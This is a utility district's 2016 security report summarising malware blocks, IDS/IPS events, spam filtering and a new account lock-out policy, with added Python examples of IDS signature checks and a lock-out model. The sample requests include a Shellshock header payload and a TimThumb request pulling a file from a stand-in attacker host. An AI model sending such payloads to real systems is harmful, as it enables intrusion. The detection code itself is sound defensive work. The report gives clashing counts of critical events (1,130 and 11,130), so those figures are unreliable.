2016 CCCSD Security Report
A summary of security related events and initiatives for the Central Contra Costa Sanitary District.

Central Contra Costa Sanitary District
Q2 2016
CCCSD SECURITY REPORT
Executive Summary
MALWARE
• The FireEye appliance detected and blocked a total of 72 infections in 2016, of which three were classified as
critical and ten were classified as major. The Barracuda web filtering appliance blocked 12,728
requests to web pages that contained malware during the year.
SPAM
• The Barracuda spam filter blocked over 2,700 viruses that attempted to enter the organization via
email during the year.
NOTABLE SECURITY EVENTS
• The Intrusion Detection and Intrusion Prevention (IDS/IPS) components were enabled on the
FireEye device in the fourth quarter. During this time period, 1,130 critical events were detected
and blocked across 20 different Central San devices.
• The transition to a new anti-spam/email filtering appliance was completed.
• Two security assessments were completed by two independent third party organizations.
• A network account lock-out policy went into effect for every Central San network account.
FireEye
Malware
The FireEye appliance detected and blocked a total of 72 infections in 2016, of which three were classified as critical
and ten were classified as major. One of the critical infections (DTI.Callback) is capable of gaining complete
control of a system and allows the compromised system to launch other attacks against PCs connected to
the same network. The second critical infection (Trojan-Hop-tto) allows malicious software programs to be
installed without consent from the PC's owner; these programs are then typically used to install malware on other
systems. The third critical infection was a ransomware attack that was blocked before it was allowed to
execute on the PC.
In 2016, malware created with the Angler Exploit Kit was the most common type of malware detected
by FireEye.
Figure: Top 5 Malware (pie chart). Categories shown: Exploit.Kit.Angler, FE_Possible_Signed_32, Exploit.Kit.Malvertisement, Exploit.Dropper.url.VVX, Exploit.Kit.Rig, Other. Legible shares: 35%, 32%, 12%, 6% (the chart does not preserve which share belongs to which category).
Intrusion Detection and Intrusion Prevention
The Intrusion Detection and Intrusion Prevention (IDS/IPS) components were enabled on the FireEye
device in the fourth quarter. During this time period, 11,130 critical events were detected and blocked
across 20 different Central San devices. IDS/IPS events represent attempts by an attacker to compromise a
computing device by exploiting a known vulnerability.
Figure: Events Summary (critical event count and number of hosts affected).
Top 10 Attacks by Rule

Rank  Rule Description                                                             Attack Count
1     Bash Remote Code Injection (Shellshock, HTTP CGI headers)                    496
2     Squid CVE-2010-3072 Crafted HTTP Request Denial Of Service                   388
3     TimThumb src Parameter PHP File Upload Code Execution                        84
4     Possible Cross-site Scripting Attack                                         65
5     Microsoft XML Core Services Uninitialized Object Access                      41
6     Mozilla Products Graphics and XML Features Integer Overflows                 32
7     Exim with Dovecot LDA sender_address Parameter Remote Command Execution      14
8     WordPress Slider Revolution Plugin Local File Inclusion                      6
9     Microsoft Internet Explorer HTML Help Remote Code Execution                  4
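As an added illustration (not part of the Central San report and not FireEye's rule set), the following Python sketch shows the kind of signature check that sits behind the first and third rules in the table, applied to three constructed HTTP requests. The rule names, the sample requests and the host names are assumptions made for the example; the indicators themselves are the well-known ones for Shellshock (CVE-2014-6271) and for the TimThumb remote file fetch via the src parameter.

```python
"""Added example, not code from the Central San report or from FireEye.
Signature checks for two of the rules in the table above, run over
constructed HTTP requests."""
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Shellshock: a bash function definition "() {" with a command after the
# closing brace, carried in any request header a CGI script exports into the
# environment (User-Agent, Referer, Cookie, ...).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# TimThumb: the script name used by the vulnerable WordPress theme helper.
# Old versions fetched an off-site URL given in `src` and saved it locally,
# so an absolute URL in `src` is the indicator.
TIMTHUMB_PATH_RE = re.compile(r"(?:^|/)(?:timthumb|thumb)\.php$", re.IGNORECASE)

RULE_SHELLSHOCK = "Bash Remote Code Injection (Shellshock, HTTP CGI headers)"
RULE_TIMTHUMB = "TimThumb src Parameter PHP File Upload Code Execution"


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into method, target and lower-cased headers."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def match_rules(raw: str) -> List[str]:
    """Return the names of the rules that fire on one raw request."""
    _method, target, headers = parse_request(raw)
    hits: List[str] = []
    if any(SHELLSHOCK_RE.search(v) for v in headers.values()):
        hits.append(RULE_SHELLSHOCK)
    parts = urlsplit(target)
    if TIMTHUMB_PATH_RE.search(parts.path):
        # Only an absolute URL (one with a host part) points off-site.
        if any(urlsplit(src).netloc for src in parse_qs(parts.query).get("src", [])):
            hits.append(RULE_TIMTHUMB)
    return hits


def count_by_rule(requests: List[str]) -> Dict[str, int]:
    """Tally rule hits the way the 'Attack Count' column in the table does."""
    counts: Dict[str, int] = {}
    for raw in requests:
        for rule in match_rules(raw):
            counts[rule] = counts.get(rule, 0) + 1
    return counts


# Constructed sample traffic (not taken from Central San logs).
SAMPLE_REQUESTS = [
    "GET /cgi-bin/status HTTP/1.1\r\nHost: example.invalid\r\n"
    "User-Agent: () { :; }; /bin/bash -c 'id'\r\n\r\n",
    "GET /wp-content/themes/x/timthumb.php?src=http://attacker.invalid/s.php HTTP/1.1\r\n"
    "Host: example.invalid\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: example.invalid\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]

if __name__ == "__main__":
    for rule, n in count_by_rule(SAMPLE_REQUESTS).items():
        print(f"{n:4d}  {rule}")
```

The checks are deliberately narrow: a local path in src (for example `src=/img/a.jpg`) does not fire the TimThumb rule, and a plain browser User-Agent does not fire the Shellshock rule, which is the same false-positive discipline an IPS rule needs before it is allowed to block rather than only alert.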
Spam
The Barracuda spam filter blocked over 2,700 viruses that attempted to enter the organization via email
during the year. 1.5 million messages were identified as spam and an additional 814,000 pieces of email
were throttled. Throttled messages typically indicate a high amount of spam being sent to the CCCSD mail
server at once and are presumed to be spam.
Figure: Email breakdown (pie chart). Spam: 52%; Rate Controlled (throttled): 27%; Bad Recipient: 1%; Virus and Legitimate Email: shares not legible.
Web Filtering: Malware
The Barracuda web filtering appliance blocked 12,728 requests to web pages that contained malware
during the year. The large increase in the number of requests to malicious websites in the fourth quarter
was attributed to an update to the malware scanning engine that caused numerous false positives. IT staff
is in the process of investigating the validity of these requests.
Blocked requests by quarter:
Q1: 834 requests
Q2: 992 requests
Q3: 2,629 requests
Q4: 8,273 requests
Notable Security Events
• A ransomware attack was detected and stopped before it could execute on a PC, potentially saving
Central San tens of thousands of dollars in staff time that would have been needed to remove the
infection and restore the affected files.
• An email was sent to all district staff informing them that passwords of compromised LinkedIn
accounts were freely available on the internet. Employees were advised to change their LinkedIn
password if they had not done so since May 2016 or if their LinkedIn password was the same as or
similar to their district network password.
• The transition to a new anti-spam and email filtering appliance was completed. Service with the
prior solution, Google Apps, was terminated.
• A vulnerability scan was conducted on Central San's internet facing devices as part of the district's
Payment Card Industry (PCI) compliance requirement. No existing high risk vulnerabilities were
detected; however, one potential high risk vulnerability was discovered, which was remedied in the
fourth quarter. Central San was awarded an overall score of "3" on a scale of "5". The industry
average for this type of scan is a rating of "2.3".
• A comprehensive security assessment was performed on the District's external (internet facing) as
well as internal (private network) systems. The external scan found that adequate protection
exists at the district's main entry point from the internet. The internal scan found several issues
with a wide range of severity. IT staff has formulated a remediation plan that is anticipated to be
completed in the second quarter of 2017.
• An account lock-out policy went into effect for every network logon in the district. Under this policy, a
network account will automatically lock after five unsuccessful logon attempts. The account will
then remain locked for 30 minutes, after which it will unlock automatically.
• Intrusion Detection and Intrusion Prevention (IDS/IPS) components were enabled on the FireEye
device. These components will help to detect and prevent the exploitation of known
vulnerabilities across a wide range of computing devices in use at Central San.
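The lock-out rule above (five failed logons, locked for 30 minutes, automatic unlock) is easy to state and easy to get subtly wrong, so here is an added reference model of it in Python. It is not code from the Central San report or from its directory service; the account name, the password store and the injected clock are stand-ins for the example.

```python
"""Added example, not code from the Central San report: a reference model of
the account lock-out policy (5 failures lock the account for 30 minutes,
then it unlocks on its own). Credential store and clock are stand-ins."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Optional

LOCKOUT_THRESHOLD = 5                     # failed attempts before the lock
LOCKOUT_DURATION = timedelta(minutes=30)  # how long the lock lasts


@dataclass
class AccountState:
    failures: int = 0                      # consecutive failed logons
    locked_until: Optional[datetime] = None


class LogonGate:
    """Counts failed logons per account and refuses logons while locked."""

    def __init__(self, credentials: Dict[str, str]):
        self._creds = credentials          # hypothetical store: account -> password
        self._state: Dict[str, AccountState] = {}

    def is_locked(self, account: str, now: datetime) -> bool:
        st = self._state.get(account)
        if st is None or st.locked_until is None:
            return False
        if now >= st.locked_until:         # lock expired: unlock and reset
            st.locked_until = None
            st.failures = 0
            return False
        return True

    def logon(self, account: str, password: str, now: datetime) -> str:
        """Return 'ok', 'bad_password' or 'locked'."""
        st = self._state.setdefault(account, AccountState())
        if self.is_locked(account, now):
            return "locked"                # even the right password is refused
        if self._creds.get(account) == password:
            st.failures = 0                # a success resets the counter
            return "ok"
        st.failures += 1
        if st.failures >= LOCKOUT_THRESHOLD:
            st.locked_until = now + LOCKOUT_DURATION
            return "locked"                # the fifth failure triggers the lock
        return "bad_password"


def walkthrough() -> Dict[str, str]:
    """Exercise the policy on one constructed account and return what happened."""
    gate = LogonGate({"jdoe": "correct-horse"})   # constructed credential
    t0 = datetime(2016, 10, 1, 9, 0, 0)
    for i in range(4):
        gate.logon("jdoe", "wrong", t0 + timedelta(seconds=i))
    return {
        "fifth_failure": gate.logon("jdoe", "wrong", t0 + timedelta(seconds=4)),
        "right_password_while_locked": gate.logon("jdoe", "correct-horse", t0 + timedelta(minutes=29)),
        "right_password_after_30_min": gate.logon("jdoe", "correct-horse", t0 + timedelta(minutes=31)),
    }


if __name__ == "__main__":
    for step, result in walkthrough().items():
        print(f"{step}: {result}")
```

Two points the model makes visible: while the lock is in force the correct password is refused too, which is what makes a lock-out a denial-of-service lever against any account whose name an attacker knows, and the failure counter only clears on a successful logon or on expiry. Directory services such as Active Directory additionally define an observation window after which the counter resets on its own; that window is omitted here as an assumption of the example, not a statement about Central San's configuration.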